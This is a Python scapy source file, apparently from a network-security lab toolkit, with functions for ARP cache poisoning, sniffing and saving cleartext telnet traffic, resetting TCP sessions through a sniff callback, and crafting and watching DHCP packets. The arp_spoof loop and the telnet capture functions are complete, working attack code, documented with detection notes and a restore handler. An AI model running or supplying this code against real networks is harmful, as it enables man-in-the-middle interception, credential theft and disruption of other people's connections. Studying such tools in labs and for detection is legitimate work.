def arp_spoof(ip_1, ip_2, ifname='Net1'):
    """Poison ip_1's ARP cache so that ip_2 resolves to this host's MAC, until Ctrl+C.

    Once per second an unsolicited ARP reply (op=2) is unicast to ip_1's real MAC,
    claiming that ip_2 lives at this host's MAC. The loop never returns; SIGINT is
    routed to sigint_handler, which re-sends the correct binding and exits. On the
    wire this is the classic ARP cache-poisoning signature: unsolicited replies plus
    an IP-to-MAC binding that flips every second, which is what switch ARP
    inspection and host ARP watchers alert on.

    Args:
        ip_1: IP address of the device whose ARP cache is poisoned.
        ip_2: IP address this host impersonates toward ip_1.
        ifname: Interface used to send; defaults to 'Net1'.

    Side effects: writes the module globals localip, localmac, ip_1_mac, ip_2_mac,
    g_ip_1, g_ip_2 and g_ifname (read back by sigint_handler), installs a SIGINT
    handler, and blocks forever. Depends on get_ip_address, get_mac_address,
    arp_request, sigint_handler, scapy_iface and the scapy names sendp/Ether/ARP
    defined elsewhere in the file.
    """
    global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname  # globals shared with sigint_handler
    g_ip_1 = ip_1  # IP of the device whose ARP cache is poisoned
    g_ip_2 = ip_2  # IP that this host impersonates
    g_ifname = ifname  # interface used for sending

    # Local IP of ifname, kept in the module global localip
    localip = get_ip_address(ifname)
    # Local MAC of ifname, kept in the module global localmac
    localmac = get_mac_address(ifname)
    # Real MAC of ip_1. arp_request yields None here when resolution fails
    # (its except branch); nothing below checks for that.
    ip_1_mac = arp_request(ip_1, ifname)[1]
    # Real MAC of ip_2, needed by sigint_handler to restore the genuine binding
    ip_2_mac = arp_request(ip_2, ifname)[1]
    # Ctrl+C (signal.SIGINT) is handed to sigint_handler, the only exit path
    signal.signal(signal.SIGINT, sigint_handler)
    while True:  # keep sending until Ctrl+C
        # op=2: an ARP reply nobody asked for
        sendp(Ether(src=localmac, dst=ip_1_mac) / ARP(
            op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
              iface=scapy_iface(g_ifname),
              verbose=False)
        # Author's disabled variant: op=1 (ARP request) instead of a reply
        # sendp(Ether(src=localmac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface = g_ifname, verbose = False)
        # Author's note: an Ethernet src MAC that differs from the ARP hwsrc behaved the same
        # sendp(Ether(src=ip_1_mac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface = g_ifname, verbose = False)
        # Author's note: a layer-2 broadcast dst makes the impersonated device log
        # address-conflict warnings (a visible detection artifact) and the effect is unstable.
        print("发送ARP欺骗数据包!欺骗" + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!')
        time.sleep(1)
def telnet_monitor(user_filter, ifname):
    """Capture traffic matching user_filter on ifname for 10 s, save it, and hex-dump the decoded text.

    Args:
        user_filter: BPF capture filter string, passed straight to sniff().
        ifname: Interface name, resolved through scapy_iface().

    Every captured packet goes to telnet_monitor_callback (defined elsewhere), which
    presumably accumulates decoded payload into the module global qyt_string; the raw
    packets are written to "telnet.cap" in the current directory and qyt_string is
    then displayed with qythexdump. Telnet payload is cleartext and can contain
    credentials, so the capture file and the dump deserve credential-grade handling.
    """
    # Capture filtered traffic (store=1 keeps the packets for wrpcap) and decode via the callback
    PTKS = sniff(prn=telnet_monitor_callback,
                 filter=user_filter,
                 store=1,
                 iface=scapy_iface(ifname),
                 timeout=10)

    wrpcap("telnet.cap", PTKS)  # persist the captured packets to a file
    qythexdump(qyt_string)  # show the decoded text
def tcp_reset(src_ip, dst_ip, dst_port, ifname, src_port=None):
    """Sniff for the TCP flow between the given endpoints and pass each packet to tcp_monitor_callback.

    This function only builds the BPF filter and runs the capture; the author's note
    says tcp_monitor_callback (defined elsewhere) is what resets the session. sniff()
    is called without a timeout, so the call blocks indefinitely.

    Args:
        src_ip: Source host address, inserted into the filter verbatim.
        dst_ip: Destination host address, inserted into the filter verbatim.
        dst_port: Destination port as a *string* -- it is joined with `+`, so an int
            raises TypeError here.
        ifname: Interface name; resolved via scapy_iface() and kept in the module
            global global_if for the callback.
        src_port: Optional source port string; when None the filter matches any
            source port.
    """
    # Main task: capture packets matching the filter and let tcp_monitor_callback handle the reset
    global global_if
    global_if = scapy_iface(ifname)
    if src_port is None:
        match = "src host " + src_ip + " and dst host " + dst_ip + " and dst port " + dst_port
    else:
        match = "src host " + src_ip + " and dst host " + dst_ip + " and src port " + src_port + " and dst port " + dst_port
    print("开始匹配异常流量" + match)  # "start matching traffic: <filter>"
    sniff(prn=tcp_monitor_callback, filter=match, iface=global_if, store=0)
def DHCP_FULL(ifname, MAC, timeout=3):
    """Send one DHCP Discover from MAC in the background and watch the DHCP exchange for `timeout` seconds.

    The Discover is dispatched through the module-level pool (`pool.apply_async`) so
    that the sniff below is already listening when DHCP_Discover_Sendonly sends after
    its own wait_time delay. Despite the name, this function by itself issues a single
    Discover; each packet seen on UDP 67/68 is handed to DHCP_Monitor_Control.

    Args:
        ifname: Interface name; stored in the module global Global_IF.
        MAC: Client MAC address passed to DHCP_Discover_Sendonly.
        timeout: Seconds the capture runs; default 3.

    Depends on `pool`, DHCP_Discover_Sendonly, DHCP_Monitor_Control and scapy_iface,
    all defined elsewhere in the file.
    """
    global Global_IF
    Global_IF = ifname
    # Send the DHCP Discover asynchronously so the sniffer below starts first
    pool.apply_async(DHCP_Discover_Sendonly, args=(Global_IF, MAC))
    # Listen with filter "port 68 and port 67" and hand each captured packet to DHCP_Monitor_Control
    sniff(prn=DHCP_Monitor_Control,
          filter="port 68 and port 67",
          store=0,
          iface=scapy_iface(Global_IF),
          timeout=timeout)
def sigint_handler(signum, frame):  # SIGINT handler installed by arp_spoof
    """Restore the poisoned ARP binding on Ctrl+C and terminate the process.

    Sends a single ARP reply to ip_1's MAC that maps ip_2 back to ip_2's real MAC
    (both Ethernet src and ARP hwsrc carry ip_2_mac), then calls sys.exit(), which
    is how the `while True` loop in arp_spoof ends. Only one corrective reply is
    sent; if it is lost the target keeps the poisoned entry until it ages out.

    Args:
        signum: Signal number, unused.
        frame: Current stack frame, unused.

    Reads the module globals set by arp_spoof: ip_1_mac, ip_2_mac, g_ip_1, g_ip_2,
    g_ifname (localip and localmac are declared but not used here).
    """
    global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname  # globals populated by arp_spoof
    print("\n执行恢复操作!!!")
    # Send an ARP reply that restores the poisoned device's ARP cache
    sendp(Ether(src=ip_2_mac, dst=ip_1_mac) /
          ARP(op=2, hwsrc=ip_2_mac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
          iface=scapy_iface(g_ifname),
          verbose=False)
    print("已经恢复 " + g_ip_1 + " ARP缓存")
    # Exit the program; this is what breaks out of arp_spoof's while True
    sys.exit()
def telnet_rst(user_filter, ifname):
    """Capture traffic matching user_filter for 10 s, feed it to telnet_monitor_callback, save it and print the decoded text.

    Differs from telnet_monitor only in that the resolved interface is also kept in
    the module global global_if (for the callback), the packets go to "temp.cap" and
    qyt_string is printed rather than hex-dumped. What the callback does with each
    packet (the function name suggests resetting the session) is defined elsewhere.

    Args:
        user_filter: BPF capture filter string passed to sniff().
        ifname: Interface name, resolved through scapy_iface().
    """
    # Main task: capture packets with the filter and hand each to telnet_monitor_callback
    global global_if
    global_if = scapy_iface(ifname)
    PTKS = sniff(prn=telnet_monitor_callback,
                 filter=user_filter,
                 store=1,
                 iface=global_if,
                 timeout=10)
    wrpcap("temp.cap", PTKS)  # persist the captured packets
    print(qyt_string)  # decoded text accumulated by the callback (module global)
def DHCP_Request_Sendonly(ifname, options, param_req_list, wait_time=1):
    """Build and send one broadcast DHCP Request for the address a server offered.

    Args:
        ifname: Interface name, resolved through scapy_iface().
        options: dict with the keys read here: 'MAC' (Ethernet source), 'client_id'
            (raw bytes used both for chaddr and, prefixed with 0x01, as the client-id
            option), 'Server_IP' (siaddr and server_id) and 'requested_addr'.
        param_req_list: Value for the DHCP parameter-request-list option.
        wait_time: Seconds to sleep before sending; 0 sends immediately. Both
            branches send exactly once.

    Depends on chaddr, scapy_iface and the scapy names Ether/IP/UDP/BOOTP/DHCP/sendp
    from elsewhere in the file. Note that `('end')` is the plain string 'end', not a
    one-tuple; scapy accepts that spelling for the end option.
    """
    request = Ether(dst='ff:ff:ff:ff:ff:ff', src=options['MAC'],
                    type=0x0800) / IP(
                        src='0.0.0.0', dst='255.255.255.255') / UDP(
                            dport=67, sport=68) / BOOTP(
                                op=1,
                                chaddr=chaddr(options['client_id']),
                                siaddr=options['Server_IP'],
                            ) / DHCP(options=[
                                ('message-type', 'request'),
                                ('server_id', options['Server_IP']),
                                ('requested_addr', options['requested_addr']),
                                # Hardware type byte 0x01 must precede the client_id
                                ('client_id', b'\x01' + options['client_id']),
                                ('param_req_list', param_req_list),
                                ('end')
                            ])
    if wait_time != 0:
        time.sleep(wait_time)
        sendp(request, iface=scapy_iface(ifname), verbose=False)
    else:
        sendp(request, iface=scapy_iface(ifname), verbose=False)
def DHCP_Discover_Sendonly(ifname, MAC, wait_time=1):
    """Build and send one broadcast DHCP Discover from MAC on ifname.

    Args:
        ifname: Interface name, resolved through scapy_iface().
        MAC: Client MAC as a string; used as the Ethernet source and, after
            Change_MAC_To_Bytes, as the BOOTP chaddr.
        wait_time: Seconds to sleep before sending; 0 sends immediately. Both
            branches send exactly once.

    The parameter-request-list comes from the module global bytes_requested_options.
    Depends on Change_MAC_To_Bytes, chaddr, scapy_iface and the scapy names
    Ether/IP/UDP/BOOTP/DHCP/sendp from elsewhere in the file. `('end')` is the plain
    string 'end', which scapy accepts as the end option.
    """
    Bytes_MAC = Change_MAC_To_Bytes(MAC)  # MAC string -> raw bytes for chaddr
    # Without param_req_list the server answers with only an IP and no other parameters
    discover = Ether(dst='ff:ff:ff:ff:ff:ff',
                     src=MAC,
                     type=0x0800) / IP(src='0.0.0.0',
                                       dst='255.255.255.255') / UDP(dport=67,
                                                                    sport=68) / BOOTP(op=1,
                                                                                      chaddr=chaddr(Bytes_MAC)) / DHCP(
                                                                                                                        options=[('message-type', 'discover'),
                                                                                                                                 ('param_req_list',
                                                                                                                                  bytes_requested_options),
                                                                                                                                 ('end')])

    if wait_time != 0:
        time.sleep(wait_time)
        sendp(discover,
              iface=scapy_iface(ifname),
              verbose=False)
    else:
        sendp(discover,
              iface=scapy_iface(ifname),
              verbose=False)
def arp_request(ip_address, ifname='ens33'):
    """Resolve ip_address to a MAC with a single ARP request on ifname.

    Args:
        ip_address: IPv4 address to resolve.
        ifname: Interface name; defaults to 'ens33'.

    Returns:
        (ip_address, hwsrc) where hwsrc is the MAC string from the first reply, or
        (ip_address, None) when no reply arrives within 1 s (sr1 returns None, so
        .getlayer raises AttributeError) or the reply carries no ARP layer.

    Depends on get_ip_address, get_mac_address, scapy_iface and the scapy names
    sr1/ARP from elsewhere in the file. Only AttributeError is handled; other
    failures (e.g. interface errors) propagate.
    """
    # Local IP address, used as the ARP sender address
    localip = get_ip_address(ifname)
    # Local MAC address, used as the ARP sender hardware address
    localmac = get_mac_address(ifname)
    try:  # send the request and wait (at most 1 s) for one reply
        result_raw = sr1(ARP(op=1,
                             hwsrc=localmac,
                             hwdst='00:00:00:00:00:00',
                             psrc=localip,
                             pdst=ip_address),
                         iface=scapy_iface(ifname),
                         timeout=1,
                         verbose=False)

        return ip_address, result_raw.getlayer(ARP).fields['hwsrc']

    except AttributeError:
        return ip_address, None
def DHCP_Sinffer(ifname):
    """Passively watch DHCP traffic (UDP 67/68) on ifname, forwarding each packet to DHCP_Monitor.

    Args:
        ifname: Interface name, resolved through scapy_iface().

    sniff() runs with store=0 and no timeout, so this blocks indefinitely and keeps
    no packets itself; DHCP_Monitor (defined elsewhere) does all processing. Note
    the function name is spelled "Sinffer" (sic) and callers must use it as-is.
    """
    sniff(prn=DHCP_Monitor,
          filter="port 68 and port 67",
          iface=scapy_iface(ifname),
          store=0)